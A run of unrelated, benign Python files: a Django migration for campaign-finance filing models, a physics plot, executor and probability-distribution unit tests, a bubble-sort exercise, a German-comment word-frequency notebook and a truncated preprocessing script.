* xValue) + (0.8 * yValue)) playersDic[players] = ranking minsList.clear() for i in sorted(playersDic.values(), reverse=True): count += 1 print(str(count) + '.', colored(get_key(i).__getattribute__('name'), 'red'))calaccess_processed_filings/migrations/0007_auto_20180426_2354.py # Generated by Django 2.0.4 on 2018-04-26 23:54 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('calaccess_processed_filings', '0006_auto_20180426_1733'), ] operations = [ migrations.CreateModel( name='Form461Filing', fields=[ ('date_filed', models.DateField(db_index=True, help_text='Date this report was filed, according to the filer (from CVR_CAMPAIGN_DISCLOSURE.RPT_DATE)', verbose_name='date filed')), ('filer_id', models.IntegerField(db_index=True, help_text='Numeric filer identification number (from FILER_XREF.FILER_ID)', verbose_name='filer id')), ('filer_lastname', models.CharField(help_text='Last name of filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAML)', max_length=200, verbose_name='filer last name')), ('filer_firstname', models.CharField(blank=True, help_text='First name of the filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAMF)', max_length=45, verbose_name='filer first name')), ('election_date', models.DateField(db_index=True, help_text='Date of the election in which the filer is participating (from CVR_CAMPAIGN_DISCLOSURE.ELECT_DATE)', null=True, verbose_name='election date')), ('filing_id', models.IntegerField(help_text='Unique identification number for the Form 461 filing (from CVR_CAMPAIGN_DISCLOSURE_CD.FILING_ID)', primary_key=True, serialize=False, verbose_name='filing id')), ('amendment_count', models.IntegerField(db_index=True, help_text='Number of amendments to the Form 461 filing (from maximum value of CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='Count amendments')), ], options={ 'verbose_name': 'Form 461 (Campaign Disclosure) filing', }, ), migrations.CreateModel( name='Form461FilingVersion', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date_filed', models.DateField(db_index=True, help_text='Date this report was filed, according to the filer (from CVR_CAMPAIGN_DISCLOSURE.RPT_DATE)', verbose_name='date filed')), ('filer_id', models.IntegerField(db_index=True, help_text='Numeric filer identification number (from FILER_XREF.FILER_ID)', verbose_name='filer id')), ('filer_lastname', models.CharField(help_text='Last name of filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAML)', max_length=200, verbose_name='filer last name')), ('filer_firstname', models.CharField(blank=True, help_text='First name of the filer (from CVR_CAMPAIGN_DISCLOSURE.FILER_NAMF)', max_length=45, verbose_name='filer first name')), ('election_date', models.DateField(db_index=True, help_text='Date of the election in which the filer is participating (from CVR_CAMPAIGN_DISCLOSURE.ELECT_DATE)', null=True, verbose_name='election date')), ('statement_type', models.CharField(help_text='Type of statement, e.g., "Quarterly", "Semi-Annual", Pre-Election (from CVR_CAMPAIGN_DISCLOSURE.STMT_TYPE)', max_length=50, verbose_name='statement type')), ('from_date', models.DateField(db_index=True, help_text='The first date of the filing period covered by the statement (from CVR_CAMPAIGN_DISCLOSURE.FROM_DATE)', verbose_name='from date')), ('thru_date', models.DateField(db_index=True, help_text='The last date of the filing period covered by the statement (from CVR_CAMPAIGN_DISCLOSURE.THRU_DATE)', verbose_name='thru date')), ('amend_id', models.IntegerField(help_text='Identifies the version of the Form 461 filing, with 0 representing the initial filing (from CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='amendment id')), ('filing', models.ForeignKey(db_constraint=False, help_text='Unique identification number for the Form 461 filing (from CVR_CAMPAIGN_DISCLOSURE_CD.FILING_ID)', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='versions', to='calaccess_processed_filings.Form461Filing')), ], options={ 'verbose_name': 'Form 461 (Campaign Disclosure) filing version', }, ), migrations.AlterField( model_name='form460filingversion', name='amend_id', field=models.IntegerField(help_text='Identifies the version of the Form 460 filing, with 0 representing the initial filing (from CVR_CAMPAIGN_DISCLOSURE_CD.AMEND_ID)', verbose_name='amendment id'), ), migrations.AlterIndexTogether( name='form461filing', index_together={('filing_id', 'amendment_count')}, ), migrations.AlterUniqueTogether( name='form461filingversion', unique_together={('filing', 'amend_id')}, ), migrations.AlterIndexTogether( name='form461filingversion', index_together={('filing', 'amend_id')}, ), ] import dsconcept.model import dsconcept.train 1-10 from matplotlib import pyplot as plt from math import sin, cos, radians import numpy as np sup_2 = '\N{SUPERSCRIPT TWO}' def force(theta): m = 50 g = 9.8 f_press = 350 return 0.2 * m * g * sin(radians(theta)) * sin(radians(theta)) + f_press * cos(radians(90 - theta)) x = np.linspace(45, 90, 100) y = [] for i in x: y.append(force(i)) plt.title('By pedaling on the starting block with same force\n' 'how much forward force (parallel to the ground) I can get\n' 'by setting starting block to different angles?', fontsize=14) plt.xlabel('degree of starting block (degree)', fontsize=14) plt.ylabel('parallel force pointing forward\n(Newton)', fontsize=14) plt.plot(x, y, label=f'F = 20%mg sin{sup_2}\u03b8 + Fp cos(90 - \u03b8)', color='k') dx = [45, 60, 70, 80, 90] dy = [] for i in dx: di = force(i) dy.append(di) if i == 45: plt.annotate(s=f'({i}, {round(di)})', xy=[i + 6, di + 20], fontsize=14) elif i != 90 and i != 80: plt.annotate(s=f'({i}, {round(di)})', xy=[i + 2, di], fontsize=14) elif i == 80: plt.annotate(s=f'({i}, {round(di)})', xy=[i - 8, di + 4], fontsize=14) else: plt.annotate(s=f'({i}, {round(di)})', xy=[i - 7, di - 14], fontsize=14) plt.scatter(dx, dy, color='k', linewidths=3) plt.legend(fontsize=14, loc='lower right') plt.tight_layout() plt.show() ufora/FORA/python/PurePython/ExecutorTestCommon.py # Copyright 2015 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pyfora.Exceptions import logging import numpy import pandas import time import traceback class ExecutorTestCommon(object): def create_executor(self, allowCached=True): """Subclasses of the test harness should implement""" raise NotImplementedError() def evaluateWithExecutor(self, func, *args, **kwds): shouldClose = True if 'executor' in kwds: executor = kwds['executor'] shouldClose = False else: executor = self.create_executor(kwds.get('allowCached', True)) try: func_proxy = executor.define(func).result() args_proxy = [executor.define(a).result() for a in args] res_proxy = func_proxy(*args_proxy).result() result = res_proxy.toLocal().result() return result finally: if shouldClose: executor.__exit__(None, None, None) def defaultComparison(self, x, y): if isinstance(x, basestring) and isinstance(y, basestring): return x == y if hasattr(x, '__len__') and hasattr(y, '__len__'): l1 = len(x) l2 = len(y) if l1 != l2: return False for idx in range(l1): if not self.defaultComparison(x[idx], y[idx]): return False return True else: same = x == y and type(x) is type(y) if not same: print "Results differed: ", x, y, ". Types are ", type(x), " and ", type(y) return same def equivalentEvaluationTest(self, func, *args, **kwds): comparisonFunction = self.defaultComparison if 'comparisonFunction' in kwds: comparisonFunction = kwds['comparisonFunction'] with self.create_executor() as executor: t0 = time.time() func_proxy = executor.define(func).result() args_proxy = [executor.define(a).result() for a in args] res_proxy = func_proxy(*args_proxy).result() pyforaResult = res_proxy.toLocal().result() t1 = time.time() pythonResult = func(*args) t2 = time.time() self.assertTrue( comparisonFunction(pyforaResult, pythonResult), "Pyfora and python returned different results: %s != %s for %s(%s), respectively" % ( pyforaResult, pythonResult, func, args) ) if t2 - t0 > 5.0: print "Pyfora took ", t1 - t0, ". python took ", t2 - t1 return pythonResult def equivalentEvaluationTestThatHandlesExceptions(self, func, *args, **kwds): comparisonFunction = self.defaultComparison if 'comparisonFunction' in kwds: comparisonFunction = kwds['comparisonFunction'] with self.create_executor() as executor: try: pythonResult = func(*args) pythonSucceeded = True except Exception as ex: pythonSucceeded = False try: pyforaResult = self.evaluateWithExecutor(func, *args, executor=executor) pyforaSucceeded = True except pyfora.Exceptions.ComputationError as ex: if pythonSucceeded: logging.error("Python succeeded, but pyfora threw %s for %s%s", ex, func, args) pyforaSucceeded = False except: logging.error("General exception in pyfora for %s%s:\n%s", func, args, traceback.format_exc()) return False self.assertEqual(pythonSucceeded, pyforaSucceeded, "Pyfora and python returned successes: %s%s" % (func, args) ) if pythonSucceeded: self.assertTrue(comparisonFunction(pythonResult, pyforaResult), "Pyfora and python returned different results: %s != %s for %s%s, respectively" % ( pyforaResult, pythonResult, func, args) ) return pythonResult def assertArraysAreAlmostEqual(self, m1, m2): self.assertTrue( numpy.allclose(m1, m2) ) def checkFramesEqual(self, df1, df2): pandas.util.testing.assert_frame_equal(df1, df2) return True def checkSeriesEqual(self, series1, series2, **kwargs): pandas.util.testing.assert_series_equal(series1, series2, **kwargs) return True 0 __author__ = '' """ Отсортировать по убыванию методом «пузырька» одномерный целочисленный массив, заданный случайными числами на промежутке [-100; 100). Вывести на экран исходный и отсортированный массивы. """ import hw_07 as lib def bubble_sort(nsl: list) -> list: """ classic sorting algorithm - bubble sort. :param nsl: type list: non sorted list :return: type list: sorted list """ sl = nsl[:] n = len(sl) if n < 2: return sl for i in range(len(sl)): for j in range(len(sl) - 1, i, -1): if sl[j] > sl[j-1]: sl[j], sl[j-1] = sl[j-1], sl[j] return sl def main(arr: list = None, is_print: bool = True) -> list: """ main function that combines all the functions of the module. :param is_print: type bool: flag, if True, then function will print result, else not print. :param arr: type list: non sorted list, if the value of the parameter is not specified, then an array of random numbers is created. :return: type list: sorted list """ non_sort_list = arr if arr else lib.generate_int_array() sorted_list = bubble_sort(nsl=non_sort_list) if is_print: print(f"Non sorted list:") lib.pretty_print(arr=non_sort_list) print(f"\nList after Bubble sort:") lib.pretty_print(arr=sorted_list) return sorted_list if __name__ == '__main__': main() # Copyright 2020,2021 Sony Corporation. # Copyright 2021 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import pytest import nnabla as nn import nnabla_rl.distributions as D class TestSquashedGaussian(object): def setup_method(self, method): nn.clear_parameters() np.random.seed(0) def test_sample(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) * 5 ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) sampled = distribution.sample() assert sampled.shape == input_shape sampled.forward(clear_no_need_grad=True) sampled = sampled.data.data assert np.alltrue((-1.0 <= sampled) & (sampled <= 1.0)) def test_choose_probable(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) probable_action = distribution.choose_probable() assert probable_action.shape == mean.shape probable_action.forward(clear_no_need_grad=True) probable_action = probable_action.data.data assert np.alltrue((-1.0 <= probable_action) & (probable_action <= 1.0)) assert np.allclose(probable_action, np.tanh(mean), atol=1e-5) def test_mean(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) with pytest.raises(NotImplementedError): distribution.mean() @pytest.mark.parametrize("x", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_log_prob(self, x, mean, var): mean = np.array(mean).reshape((1, 1)) ln_var = np.array(np.log(var)).reshape((1, 1)) distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) ln_var = np.log(var) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) x_var = nn.Variable((1, 1)) x_var.d = np.tanh(x) actual = distribution.log_prob(x_var) actual.forward(clear_no_need_grad=True) actual = actual.data.data assert np.isclose(expected, actual) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=0.5, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=0.5, stop=1.5, step=0.25)) def test_sample_and_compute_log_prob(self, mean, var): mean = np.array(mean).reshape((1, 1)) ln_var = np.array(np.log(var)).reshape((1, 1)) distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) ln_var = np.log(var) sample, actual = distribution.sample_and_compute_log_prob() # FIXME: if you enable clear_no_need_grad seems to compute something different # Do NOT use forward_all and no_need_grad flag at same time # nnabla's bug? nn.forward_all([sample, actual]) x = np.arctanh(sample.data.data, dtype=np.float64) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = actual.data.data assert np.isclose(expected, actual, atol=1e-3, rtol=1e-2) def test_sample_and_compute_log_prob_shape(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) ln_var = np.log(sigma) * 2.0 distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) sample, actual_log_prob = distribution.sample_and_compute_log_prob() assert sample.shape == input_shape assert actual_log_prob.shape == (batch_size, 1) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_sample_multiple_and_compute_log_prob(self, mean, var): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mu = np.ones(shape=input_shape) * mean ln_var = np.ones(shape=input_shape) * np.log(var) distribution = D.SquashedGaussian(mean=mu, ln_var=ln_var) num_samples = 10 samples, log_probs = distribution.sample_multiple_and_compute_log_prob( num_samples=num_samples) # FIXME: if you enable clear_no_need_grad seems to compute something different # Do NOT use forward_all and no_need_grad flag at same time # nnabla's bug? nn.forward_all([samples, log_probs]) assert np.alltrue(-1.0 <= samples.d) assert np.alltrue(samples.d <= 1.0) # Check the first sample independently x = np.arctanh(samples.d[:, 0, :], dtype=np.float64) assert x.shape == (batch_size, output_dim) gaussian_log_prob = -0.5 * np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mu) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = log_probs.d assert expected.shape == (batch_size, 1) assert np.allclose(expected, actual[:, 0, :], atol=1e-3, rtol=1e-2) # Check all the samples mu = np.reshape(mu, newshape=(batch_size, 1, output_dim)) ln_var = np.reshape(ln_var, newshape=(batch_size, 1, output_dim)) x = np.arctanh(samples.d, dtype=np.float64) gaussian_log_prob = -0.5 * np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mu) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = log_probs.d assert np.allclose(expected, actual, atol=1e-3, rtol=1e-2) def test_sample_multiple_and_compute_log_prob_shape(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) * 5. ln_var = np.log(sigma) * 2. distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) num_samples = 10 samples, log_probs = distribution.sample_multiple_and_compute_log_prob( num_samples=num_samples) nn.forward_all([samples, log_probs]) assert samples.shape == (batch_size, num_samples, output_dim) assert log_probs.shape == (batch_size, num_samples, 1) @pytest.mark.parametrize("x", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_log_prob_internal(self, x, mean, var): input_shape = (10, 10) dummy_mean = np.zeros(shape=input_shape) dummy_sigma = np.ones(shape=input_shape) dummy_ln_var = np.log(dummy_sigma) * 2.0 distribution = D.SquashedGaussian(mean=dummy_mean, ln_var=dummy_ln_var) ln_var = np.log(var) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) x_var = nn.Variable((1, 1)) x_var.d = x actual = distribution._log_prob_internal( x_var, mean=mean, var=var, ln_var=ln_var) actual.forward(clear_no_need_grad=True) actual = actual.d assert np.isclose(expected, actual) if __name__ == "__main__": pytest.main() # --- # jupyter: # jupytext: # formats: ipynb,py:percent # text_representation: # extension: .py # format_name: percent # format_version: '1.3' # jupytext_version: 1.11.1 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # %% from utils import loading, nlp, cleaning, visualizing, feature_engineering import pandas as pd from nltk.corpus import stopwords stopwords=stopwords.words('german') from string import punctuation from collections import Counter import matplotlib.pyplot as plt # %% tags=[] df = loading.load_extended_posts() # %% df = feature_engineering.add_column_ann_round(df) # %% [markdown] # Defining function for top words for labels # %% def top_words_label(df, label, text, stop=False, stopwords=None, plot=True, return_list=True, all_plots=True): df_clean=df.dropna(subset=[label]) df_clean.loc[:,text]=cleaning.strip_punct(df_clean[text]) if stop: df_clean.loc[:,text]=nlp.strip_stopwords(df_clean[text], stopwords=stopwords) df_pos = df_clean[df_clean[label]==1] df_neg = df_clean[df_clean[label]==0] topwords_pos = feature_engineering.calculate_top_words(df_pos[text], relative=True) topwords_neg = feature_engineering.calculate_top_words(df_neg[text], relative=True) topwords_pos_rel = topwords_pos.subtract(topwords_neg, fill_value=0).sort_values(ascending=False) topwords_neg_rel = (-topwords_pos_rel).sort_values(ascending=False) if plot and all_plots: print(f'Order of plots:\nTop left: {label} = positive\nTop right: {label} = negative\nBottom left: {label} = positive, specific\nBottom right: {label} = negative, specific') plt.figure(figsize = (12, 12)) plt.subplot(2, 2, 1) visualizing.plot_wordcloud_freq(topwords_pos, colormap='BuGn') plt.subplot(2, 2, 2) visualizing.plot_wordcloud_freq(topwords_neg, colormap='RdPu') plt.subplot(2, 2, 3) visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='YlGn') plt.subplot(2, 2, 4) visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='OrRd') plt.show() elif plot and all_plots==False: plt.figure(figsize=(12,6)) plt.subplot(1, 2, 2) visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='binary') plt.subplot(1, 2, 1) visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='RdPu') plt.show() if return_list: return topwords_pos, topwords_neg, topwords_pos_rel, topwords_neg_rel # %% [markdown] # # Getting the top words in comments for every label # %% [markdown] # ## Arguments used # %% arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'body', True, stopwords) # %% tags=[] print(f'top words for argument used positive:\n{arg_pos[:10]}') print(f'top words for argument used negative:\n{arg_neg[:10]}') print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}') print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}') # %% [markdown] # ## Discriminating # %% dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'body', True, stopwords) # %% print(f'top words for discriminating positive:\n{dis_pos[:10]}') print(f'top words for discriminating negative:\n{dis_neg[:10]}') print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}') print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}') # %% [markdown] # ## Inappropriate # %% ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'body', True, stopwords) # %% print(f'top words for innapropriate positive:\n{ina_pos[:10]}') print(f'top words for innapropriate negative:\n{ina_neg[:10]}') print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}') print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}') # %% [markdown] # ## Off-Topic # %% ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'body', True, stopwords) # %% print(f'top words for Off-Topic positive:\n{ot_pos[:10]}') print(f'top words for Off-Topic negative:\n{ot_neg[:10]}') print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}') print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}') # %% [markdown] # ## Personal stories # %% ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'body', True, stopwords) # %% print(f'top words for Personal Stories positive:\n{ps_pos[:10]}') print(f'top words for Personal Stories negative:\n{ps_neg[:10]}') print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}') print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}') # %% [markdown] # ## Possibly Feedback # %% fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords) # %% print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}') print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}') print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}') print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}') # %% [markdown] # ## Sentiment # ### Negative # %% sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords) # %% print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}') print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}') print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}') print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}') # %% [markdown] # ### Neutral # %% snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'body', True, stopwords) # %% print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}') print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}') print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}') print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}') # %% [markdown] # ### Positive # %% spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords) # %% print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}') print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}') print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}') print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}') # %% [markdown] # # Getting the top words in headline for every label # %% [markdown] # ## Arguments Used # %% arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'headline', True, stopwords) # %% tags=[] print(f'top words for argument used positive:\n{arg_pos[:10]}') print(f'top words for argument used negative:\n{arg_neg[:10]}') print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}') print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}') # %% [markdown] # ## Discriminating # %% dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'headline', True, stopwords) # %% print(f'top words for discriminating positive:\n{dis_pos[:10]}') print(f'top words for discriminating negative:\n{dis_neg[:10]}') print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}') print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}') # %% [markdown] # ## Inappropriate # %% ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'headline', True, stopwords) # %% print(f'top words for innapropriate positive:\n{ina_pos[:10]}') print(f'top words for innapropriate negative:\n{ina_neg[:10]}') print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}') print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}') # %% [markdown] # ## Off-Topic # %% ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'headline', True, stopwords) # %% print(f'top words for Off-Topic positive:\n{ot_pos[:10]}') print(f'top words for Off-Topic negative:\n{ot_neg[:10]}') print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}') print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}') # %% [markdown] # ## Personal stories # %% ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'headline', True, stopwords) # %% print(f'top words for Personal Stories positive:\n{ps_pos[:10]}') print(f'top words for Personal Stories negative:\n{ps_neg[:10]}') print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}') print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}') # %% [markdown] # ## Possibly Feedback # %% fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'headline', True, stopwords) # %% print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}') print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}') print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}') print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}') # %% [markdown] # ## Sentiment # ### Negative # %% sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'headline', True, stopwords) # %% print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}') print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}') print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}') print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}') # %% [markdown] # ### Neutral # %% snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'headline', True, stopwords) # %% print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}') print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}') print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}') print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}') # %% [markdown] # ### Positive # %% spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'headline', True, stopwords) # %% print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}') print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}') print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}') print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}') # %% [markdown] # ### Wordclouds by annotation round # %% [markdown] # ### negative # %% top_words_label(df.query('ann_round==2'), 'label_sentimentnegative', 'body', True, stopwords, True, False, False) plt.savefig('../pictures/wc_negative_round2.png') # %% top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords, True, False, False) plt.savefig('../pictures/wc_negative_all.png') # %% [markdown] # ### positive # %% top_words_label(df.query('ann_round==2'), 'label_sentimentpositive', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords, True, False, False) # %% [markdown] # ### Discriminating # %% top_words_label(df.query('ann_round==2'), 'label_discriminating', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_discriminating', 'body', True, stopwords, True, False, False) # %% [markdown] tags=[] # ### inappropriate # %% top_words_label(df.query('ann_round==2'), 'label_inappropriate', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_inappropriate', 'body', True, stopwords, True, False, False) # %% [markdown] # ## Off-Topic # %% top_words_label(df.query('ann_round==2'), 'label_offtopic', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_offtopic', 'body', True, stopwords, True, False, False) # %% [markdown] # ## Arguments used # %% top_words_label(df.query('ann_round==2'), 'label_argumentsused', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_argumentsused', 'body', True, stopwords, True, False, False) # %% [markdown] tags=[] # ### Personal stories # %% top_words_label(df.query('ann_round==2'), 'label_personalstories', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_personalstories', 'body', True, stopwords, True, False, False) # %% [markdown] # ### possibly feedback # %% top_words_label(df.query('ann_round==2'), 'label_possiblyfeedback', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords, True, False, False) # %% from argparse import ArgumentParser import numpy as np from preprocessing.compute_caliskan_features import compute_caliskan_features from preprocessing.compute_occurrences import compute_occurrences from preprocessing.context_split import context_split from preprocessing.merge_aliases_bipartite import merge_aliases_bipartite from preprocessing.time_split import time_split from util import ProcessedFolder import ipdb import json def fix_seed(seed: int): np.random.seed(seed) def dump_json_split_result(result): for i in range(len(result)): for j in result[i][1].keys(): result[i][1][j] = result[i][1][j].value with open('split_result.json', 'w', encoding='utf-8') as f: json.dump(result, f, ensure_ascii=False) def process_folder(project_folder: ProcessedFolder, n_time_buckets: int, min_context_train: float, max_context_train: float, min_count: int, max_count: int, interactive: bool): # merge_aliases_bipartite(project_folder, interactive) # compute_occurrences(project_folder) # time_split(project_folder, n_time_buckets, uniform_distribution=True) result = context_split(project_folder, min_train=min_context_train, max_train=max_context_train, min_count=min_count, max_count=max_count) dump_json_split_result(result) # compute_caliskan_features(project_folder) def run_preprocessing(n_time_buckets: int, min_context_train: float, max_context_train: float, min_count: int, max_count: int, interactive: bool, 